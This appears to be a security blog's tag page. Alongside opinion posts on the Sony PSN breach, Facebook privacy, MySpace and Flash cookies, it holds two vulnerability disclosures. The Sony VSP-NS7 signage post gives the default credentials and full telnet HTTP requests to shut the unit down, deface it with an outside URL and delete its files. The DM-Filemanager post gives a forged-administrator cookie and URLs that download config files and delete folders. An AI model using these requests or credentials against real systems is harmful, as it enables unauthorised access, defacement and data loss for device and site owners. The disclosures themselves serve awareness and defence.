nDarkness

Tag: Privacy

Sony – What Should They Do To Keep Your Business?

by on May.16, 2011, under Computer Security, Consoles, Gaming, Privacy, PS3, PSN

Sony PS3Sony has made a pretty big name for themselves recently by exposing their trusting customer’s confidential information. As details continue to emerge, it’s pretty obvious that Sony is the only one to blame. By taking a lackadaisical approach to network security, their customers are having to pay the price.

  • If the shoes were switched and you were one of the Sony board members, what would you do to ensure your customers that the same mistakes won’t be repeated?
  • How do you “make it up” to them for the mistake?
  • Is Sony’s only saving grace their seemingly endless checkbook?
  • How many of you will never do business with Sony again?
1 Comment :, , , , , more...

Sony VSP-NS7 Digital Signage Hacking

by on Sep.07, 2010, under Computer Security, Privacy, Software

Recently I tested out a Sony VSP-NS7 digital signage unit for a customer. This machine really impressed me considering I had used its predecessor the NSP100 and the newer technology was just what the client needed.

After doing some online searching I found that, other than the manual, there wasn’t much information out there on this unit. Knowing that we were going to place this box on a public network, I decided to run a few tests. I began by firing up Wireshark to sniff traffic to and from this box and was very surprised by what I found.

From this research I was able to determine that there is a web server running on port 4980 by default. Next I was able to retrieve the default username and password of the box by decoding the base64 string below.


    Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
    Authorization: Basic NSPXuser:NSPXuser

    space

Since this isn’t published anywhere else I have seen, I would guess that not many users of this system know about it. In fact I would dare say that most installations of this system are still using the default username and password since Sony only mentions that the box can be controlled using their additional VSPA-D7 management software. If it costs big bucks it must be good, right?

Below are some of my findings:


    Default user information
    ————————
    User: NSPXuser
    Pass: NSPXuser
    Port: 4980

    Found commands
    ————————
    http://ip:4980 – Contains sofware version, unit name, unit and harddrive serial number and MAC address.
    http://ip:4980/import/ – Contains all user uploaded content.
    http://ip:4980/command.php – Uses several get variables to control the box.
    http://ip:4980/upload.php – Used in conjunction with get variables to send content to the box.

    http://ip:4980/command.php?cmd=NLOG&comp=cab – Download system logs.
    http://ip:4980/command.php?cmd=SLOG – Displays system logs.
    http://ip:4980/command.php?cmd=SYST – System statistics.
    http://ip:4980/command.php?cmd=DRST – Harddrive statistics.
    http://ip:4980/command.php?cmd=PLCL – Play files.
    http://ip:4980/command.php?cmd=SPCL – Stop playing files.
    http://ip:4980/command.php?cmd=CLST&table=web – List files based on type – web, still, movie and text.
    http://ip:4980/command.php?cmd=LCNF – Load configuration files.
    http://ip:4980/command.php?cmd=RMCL – Remove files.
    http://ip:4980/command.php?cmd=LTBL – Load tables.

    Power off and restart
    ————————
    http://ip:4980/command.php?cmd=RSET&shutdown – Turn the unit off
    http://ip:4980/command.php?cmd=RSET&reboot – Restart unit

    space

Shutdown Sony VSP-NS7

Fire up a telnet session and enter:

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=RSET&shutdown HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

Without any warning the unit will shut down and have to be restarted from the box or management software if the network allows magic packets.

URL Injection/Defacement Sony VSP-NS7

Fire up a telnet session and enter:

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
PUT /upload.php?href=/import/db/property0.xml&append=0&mkdir=0 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Content-Length: 601
Cache-Control: no-cache

<?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot; standalone=&quot;yes&quot;?>
<content ver=&quot;1.0&quot; date=&quot;2010-09-06&quot; time=&quot;21:28:43&quot;>
	<delete table=&quot;WEB_TBL&quot;>
		<index>004000003</index>
	</delete>
	<insert table=&quot;WEB_TBL&quot;>
		<index>004000003</index>
		<cdate>2010-09-06 21:21:55.678</cdate>
		<title>Pwnage</title>
		<size>0</size>
		<deldate>2010-10-06</deldate>
		<link>http://www.ndarkness.com/?p=577</link>
		<info>Pwned</info>
		<change>01</change>
		<width>0</width>
		<height>0</height>
		<xoffset>0</xoffset>
		<yoffset>0</yoffset>
		<xoption>0</xoption>
		<xreload>0</xreload>
	</insert>
</content>

Next we write the group file.

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
PUT /upload.php?href=/import/group0.xml&amp;append=0&amp;mkdir=0 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Content-Length: 185
Cache-Control: no-cache

<?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?>
<group ver=&quot;1.0&quot; date=&quot;2010-09-06&quot; time=&quot;21:28:43&quot;>
	<property date=&quot;2010-09-06&quot; time=&quot;21:28:43&quot;>/import/db/property0.xml</property>
</group>

Now we need to load the file.

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=LTBL&amp;file=/import/group0.xml&amp;mode=2 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

Finally let’s force the unit to call our url.

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=PLCL&amp;id=06&amp;index=004000003 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

Delete Files From Sony VSP-NS7

First we need to obtain a list of images on the unit.
Fire up a telnet session and enter:

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=CLST&amp;table=still HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

Now we simply select the image we want to delete and enter the following:

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=RMCL&amp;table=still&amp;index=002000002 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

The VSPA-D7 management software does allow the default password and port to be changed but if the traffic is sniffed, the password can be easily decoded again. Not to mention we can use similar attack method to change the password of the box and lock the administrator out. Talk about a denial of service!

The only secure solution for this unit, is to use a crossover cable and directly connect to the box or put it on a network by itself. If you leave it on a public network it is only a matter of time before it falls prey to one of the attacks listed above.

1 Comment :, , , , more...

DM-Filemanager 3.9.6-9 Multiple Vulnerabilities

by on Aug.28, 2010, under Computer Security, Privacy, Software, Utilities

The nDarkness community has recently been working with the wonderful developers over at DutchMonkey.com to review and point out security flaws in some of their freely available software.

During this review process, there were several issues found and we will be posting them in the coming weeks for educational purposes. It is our hope that this information will be used to help others write more secure code and realize the dangers involved with these mistakes.

The next major issues we found with DM-Filemanager version 3.9.6 – 3.9.7-9* dealt with several vulnerabilities. Below is the method used to exploit this vulnerability and a list of possible exploits. Please be aware that this has since been fixed and is no longer vulnerable.

I discovered that direct calls to ajax.php, code.php and rich.php are not properly validated. Possible exploits for this vulnerability are file disclosure, loss of data and sensitive information, XSS (via source code editing), session hijacking (via XSS), web site defacement and database manipulation/exposure.

*You must use:

javascript:void(document.cookie=&quot;USER=someadminuser&quot;); void(document.cookie=&quot;USERID=50&quot;);void(document.cookie=&quot;GROUP=ADMINISTRATORS&quot;); void(document.cookie=&quot;GROUPID=1&quot;);

Create a new file (see edit below for an easier method):

    http://localhost/dm-filemanager/ajax.php?newfile=yes&filename=index.php

Download files:

    http://localhost/dm-filemanager/?download=yes&file=settings.php&currdir=/dm-filemanager/

Rename:

    http://localhost/dm-filemanager/ajax.php?file=index.shtml&currdir=/&destination=/&rn=yes&newname=index.html

Copy:

    http://localhost/dm-filemanager/ajax.php?file=config.php&currdir=/&destination=/&cp=yes

Edit: (This one has potential ;-))

    http://localhost/dm-filemanager/code.php?editfile=yes&file=exploit.php&currdir=/

Delete File:

    http://localhost/dm-filemanager/ajax.php?delete=yes&file=index.php&currdir=/wp/&destination=/wp/

Delete Folders:

    http://localhost/dm-filemanager/ajax.php?currdir=/wp/&rmdir=yes&folder=/wp/wp-admin&dir=wp-admin

All DM-Filemanager users are strongly encouraged to upgrade their software to the latest version.

Leave a Comment :, , , , , more...

Facebook’s Privacy Troubles on the Horizon

by on May.17, 2010, under Account information, Computer Security, Facebook, Privacy, Social Networking

Back in February of 2009 there was a big debate over the new terms of agreement that Facebook adopted. Due to the negative feedback over this decision, Facebook’s executives caved from the pressure and reverted to the old terms. Now a little over a year later, this same group is at it again.

If you have a Facebook account and haven’t bothered to check your privacy settings lately, you may be surprised to learn just how much any and everyone can find out about you. Due to recent changes in the company’s privacy policy, more of your personal information is now easily accessible in more ways than you can imagine.

Facebook’s idea of privacy is that you, the user, have to police what you share. In other words, it is your responsibility to constantly check your privacy settings to see if any changes have been made and opt out of these changes if you don’t agree. I’m sure that most of you would agree when I say, there are better things to do with your time than to constantly check privacy settings on a website.

Feel free to see for yourself:

  1. Once logged in, click on the ‘Account’ button and then ‘Privacy Settings’.
  2. Next click on ‘Applications and Websites’, ‘What you Share’ and hidden almost at the bottom of the page click ‘this page’.
  3. Make sure you go through each application listed by clicking on ‘Edit Settings’ and secure them to your liking.
  4. Now, go back to the ‘Applications and Websites’ page and click on ‘What your friends can show about you’ to edit the options here as well.
  5. Finally, back on the ‘Applications and Websites’ page, click on the ‘Instant Personalization Pilot Program’ link and uncheck the box that allows Facebook partners to access your public information when you arrive on their websites.

Once you finish, ask yourself, should I really be forced to put up with this?

1 Comment :, , more...

Should MySpace Be Put Out to Pasture?

by on May.13, 2010, under Myspace, Privacy, Social Networking, Software

For years I have heard many people talk about how MySpace has been losing popularity and that it will soon be gone. As of today, these predictions have yet to come true.

I can’t help but remember when everyone I knew was talking about this great new site called MySpace. I remember feeling like maybe I was missing the boat because I hadn’t bought into the hype of creating my account, customizing the page and reconnecting with all of my friends. Don’t get me wrong, I think the social networking phenomenon is a great concept and is obviously widely popular. Many starting bands have had great success using this medium to get their music out there for the world to hear and we are able to communicate with friends and family all over the world for free. With that said, I don’t really regret not buying in to this concept, I just regret not coming up with the idea first. Let’s face it, the idea of exploit my members at every turn in order to make myself more money is just genius.

So why is it that MySpace is not as popular as it once was? Where did they go wrong and can they come back from their downward spiral? Well, to be honest, I’m not really sure and personally don’t even care.

The idea of putting my personal life out there for the world to see, doesn’t appeal to me. Most people will agree that they like their privacy and are often offended when it is violated. However, these same people will put all of their information, pictures and videos out there for the world to see. I haven’t even begun to mentioned the spam and phishing attacks that have plagued these sites since their creation that so many people are fooled by daily. Does anyone see a problem here? What better playground for social engineering and identity theft can you ask for? It’s like a one stop shop for all your criminal needs.

So what are your thoughts on the future of MySpace and/or social networking?

2 Comments :, , more...

Flash Cookies and What You Don’t Know

by on Oct.10, 2009, under Computer Security, Linux, Mac OS X, Privacy, Windows

Apple Snow LeopardIf you have been browsing the internet for any period of time, I’m sure you have heard of cookies. Even though you may not be entirely sure what they do, you certainly know how to delete them. Right?

Cookies are files websites save on your computer that contain information about you. There are several legitimate purposes for these files such as remembering your login information so you don’t have to sign in every time you visit a site, keeping up with cart information as you shop online and in some cases online security such as banking sites.

With the good also comes the bad. A quick search on Google for tracking cookies will return page after page of articles on this topic. A tracking cookie will monitor your movement around the internet and will phone home to let its authors know what you are doing online. With this information they will taylor their advertising on affiliate sites so that you only get ads for what they believe interests you or they will sale this information to other advertisers.

“So what’s the big deal? My browser is set up to delete cookies at regular intervals and I don’t allow them from third party sites.”

Well here is a little fact that you may not know. The same technology that powers streaming video, online games, and animated movies, has the ability to set these cookies as well. The technology I am referring to is the flash plugin, currently developed by Adobe. These “special” cookies are not created or treated the same way as the cookies that we have all come to know and love. In fact your browser has, on its own, no control over these cookies at all.

To illustrate this point, clear your browser cookies and then take a look in the following location(s):

  • Windows: Under your current user’s Application Data directory, click on Macromedia\Flash Player\#SharedObjects and Macromedia\Flash Player\macromedia.com\support\flashplayer\sys.
  • Mac OS X: ~/Library/Preferences/Macromedia/Flash Player/#SharedObjects/[package ID of your app]/ and ~/Library/Preferences/Macromedia/Flash Player/macromedia.com/support/flashplayer/sys/
  • GNU-Linux: ~/.macromedia

Using your browser to clear cookies had no effect whatsoever on the flash cookies. That possibly and probably means that your actions are still being tracked as you surf the net. What’s more, flash cookies have the ability to restore the normal cookies that your browser just deleted.

“So what can I do about these cookies? You said earlier that my browser on its own could not delete these cookies, what does that mean?”

A developer going by the name of NettiCat, has developed an addon for Firefox called Better Privacy that will do the dirty work for you. This addon allows you to clear these cookies when you open or close your browser, at regular intervals and manually.

Now feel free to go trash those stale cookies and be on the lookout for them popping up again.

4 Comments :, , , , , , more...

Looking for something?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!

Blogroll

A few highly recommended websites...